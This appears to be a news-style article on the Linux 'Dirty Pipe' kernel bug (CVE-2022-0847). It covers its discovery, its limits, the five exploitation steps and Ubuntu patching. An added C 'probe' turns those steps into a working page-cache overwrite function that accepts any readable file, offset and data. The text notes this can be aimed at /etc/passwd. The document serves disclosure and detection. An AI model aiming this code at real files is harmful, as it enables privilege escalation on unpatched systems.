A vulnerability in the Linux kernel, tracked as CVE-2022-0847 and nicknamed "Dirty Pipe", was found by Max Kellermann. It was introduced in Linux 5.8 and is fixed in 5.16.11, 5.15.25 and 5.10.102. The investigation began with a customer support ticket in April 2021 about compressed log files that failed to decompress because of CRC errors; after months of digging, Kellermann traced the corruption to the kernel and disclosed the bug in March 2022.
The bug works only under specific conditions
According to Kellermann's write-up, the bug lets a process overwrite the page cache of any file it can read, without write permission on that file, with no timing constraints (there is no race to win), at arbitrary positions with arbitrary data. The modified page is not marked dirty, so the change is not written back to disk and disappears once the page is evicted, but until then every process that reads the file sees the attacker's bytes. Kellermann lists the limitations of the bug:
- The attacker must have read permissions (because it needs to splice() a page into a pipe)
- The offset must not be on a page boundary (because at least one byte of that page must have been spliced into the pipe)
- The write cannot cross a page boundary (because a new anonymous buffer would be created for the rest)
- The file cannot be resized (because the pipe has its own page fill management and does not tell the page cache how much data has been appended)
Kellermann's write-up also describes how the bug is exploited. To turn CVE-2022-0847 ("Dirty Pipe") into an arbitrary page-cache overwrite, an attacker follows these steps:
- Create a pipe.
- Fill the pipe with arbitrary data (to set the PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).
- Drain the pipe (leaving the flag set in all struct pipe_buffer instances on the struct pipe_inode_info ring).
- Splice data from the target file (opened with O_RDONLY) into the pipe from just before the target offset.
- Write arbitrary data into the pipe; this data will overwrite the cached file page instead of creating a new anonymous struct pipe_buffer because PIPE_BUF_FLAG_CAN_MERGE is set.
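The five steps above, turned into a self-contained probe. This is an added example, not Kellermann's proof-of-concept and not code from the page. It creates a constructed two-page temporary file, opens it read-only, runs the fill/drain/splice/write sequence against a byte range that satisfies the limitations listed earlier, and then reads the file back through the page cache: on an unpatched kernel the bytes come back changed, on a fixed kernel the write stayed in a fresh anonymous pipe buffer. The temp path, the offset 100 and the marker string "DIRTY" are arbitrary choices for the test.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* The preconditions from the write-up: the target range must sit strictly
 * inside one page (offset not on a boundary, no crossing into the next page)
 * and must not extend the file, because the pipe never resizes the inode. */
int dirty_pipe_constraints_ok(off_t offset, size_t len, off_t file_size, size_t page_size)
{
    if (len == 0 || offset <= 0) return 0;
    if (offset % (off_t)page_size == 0) return 0;                 /* need >= 1 spliced byte before it */
    if ((size_t)(offset % (off_t)page_size) + len > page_size) return 0; /* rest would get a new buffer */
    if (offset + (off_t)len > file_size) return 0;                /* cannot grow the file */
    return 1;
}

/* Steps 2 and 3: fill every slot of the pipe ring, then drain it again.
 * The freed pipe_buffer slots keep PIPE_BUF_FLAG_CAN_MERGE set. */
static int prepare_pipe(int p[2])
{
    int pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    if (pipe_size < 0) return -1;
    char chunk[4096];
    memset(chunk, 'x', sizeof chunk);
    for (int left = pipe_size; left > 0;) {
        int n = left > (int)sizeof chunk ? (int)sizeof chunk : left;
        if (write(p[1], chunk, n) != n) return -1;
        left -= n;
    }
    for (int left = pipe_size; left > 0;) {
        int n = left > (int)sizeof chunk ? (int)sizeof chunk : left;
        if (read(p[0], chunk, n) != n) return -1;
        left -= n;
    }
    return 0;
}

/* Returns 1 if `data` now shows up at `offset` when the file is read back
 * (page cache overwritten: kernel vulnerable), 0 if the write landed in a
 * fresh anonymous buffer (kernel patched), -1 on a precondition or syscall error. */
int dirty_pipe_probe(const char *path, off_t offset, const char *data, size_t len)
{
    size_t page_size = (size_t)sysconf(_SC_PAGESIZE);
    int p[2] = { -1, -1 };
    int result = -1;
    char *check = NULL;

    int fd = open(path, O_RDONLY);            /* read permission is all that is needed */
    if (fd < 0) return -1;
    off_t file_size = lseek(fd, 0, SEEK_END);

    if (file_size >= 0 && dirty_pipe_constraints_ok(offset, len, file_size, page_size)
        && pipe(p) == 0 && prepare_pipe(p) == 0 && (check = malloc(len)) != NULL) {
        /* Step 4: splice one byte of the target page so the pipe ends right before offset. */
        loff_t splice_off = offset - 1;
        if (splice(fd, &splice_off, p[1], NULL, 1, 0) == 1
            /* Step 5: on a vulnerable kernel this merges into the file's cached page. */
            && write(p[1], data, len) == (ssize_t)len
            && pread(fd, check, len, offset) == (ssize_t)len) {
            result = memcmp(check, data, len) == 0 ? 1 : 0;
        }
    }
    free(check);
    if (p[0] >= 0) { close(p[0]); close(p[1]); }
    close(fd);
    return result;
}

/* Constructed sample target (assumption, not a real file): two pages of 'A'
 * in /tmp, probed at offset 100 with "DIRTY", which meets every precondition. */
int dirty_pipe_self_test(void)
{
    size_t page_size = (size_t)sysconf(_SC_PAGESIZE);
    char path[] = "/tmp/dirtypipe_probe_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    char *filler = malloc(2 * page_size);
    int ok = filler != NULL;
    if (ok) {
        memset(filler, 'A', 2 * page_size);
        ok = write(fd, filler, 2 * page_size) == (ssize_t)(2 * page_size);
    }
    free(filler);
    close(fd);
    int result = ok ? dirty_pipe_probe(path, 100, "DIRTY", 5) : -1;
    unlink(path);
    return result;
}

int main(void)
{
    int r = dirty_pipe_self_test();
    if (r < 0) { fputs("probe could not run\n", stderr); return 2; }
    puts(r ? "page cache overwritten: kernel is VULNERABLE to CVE-2022-0847"
           : "write stayed in the pipe: kernel is patched");
    return r;
}
```

Because the probe targets a scratch file it created itself, it is safe to run on production hosts; pointing dirty_pipe_probe at a real file such as /etc/passwd on an unpatched kernel would corrupt that file's page cache for every process on the machine, which is exactly the privilege escalation the write-up warns about.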
Canonical has already fixed Ubuntu
Canonical has released fixed kernels for Ubuntu 21.10 and 20.04 LTS. According to Canonical's advisory, only Ubuntu systems running the 5.13 kernel are affected, which means 21.10 and 20.04 LTS with the hardware enablement (HWE) kernel; the default 5.4 kernel of 20.04 predates the bug's introduction in 5.8. The update also bundles several other security fixes, and Canonical urges users to install it immediately. Check which kernel you are running with uname -r, then update with the following commands and reboot so that the patched kernel is actually loaded:
sudo apt update
sudo apt full-upgrade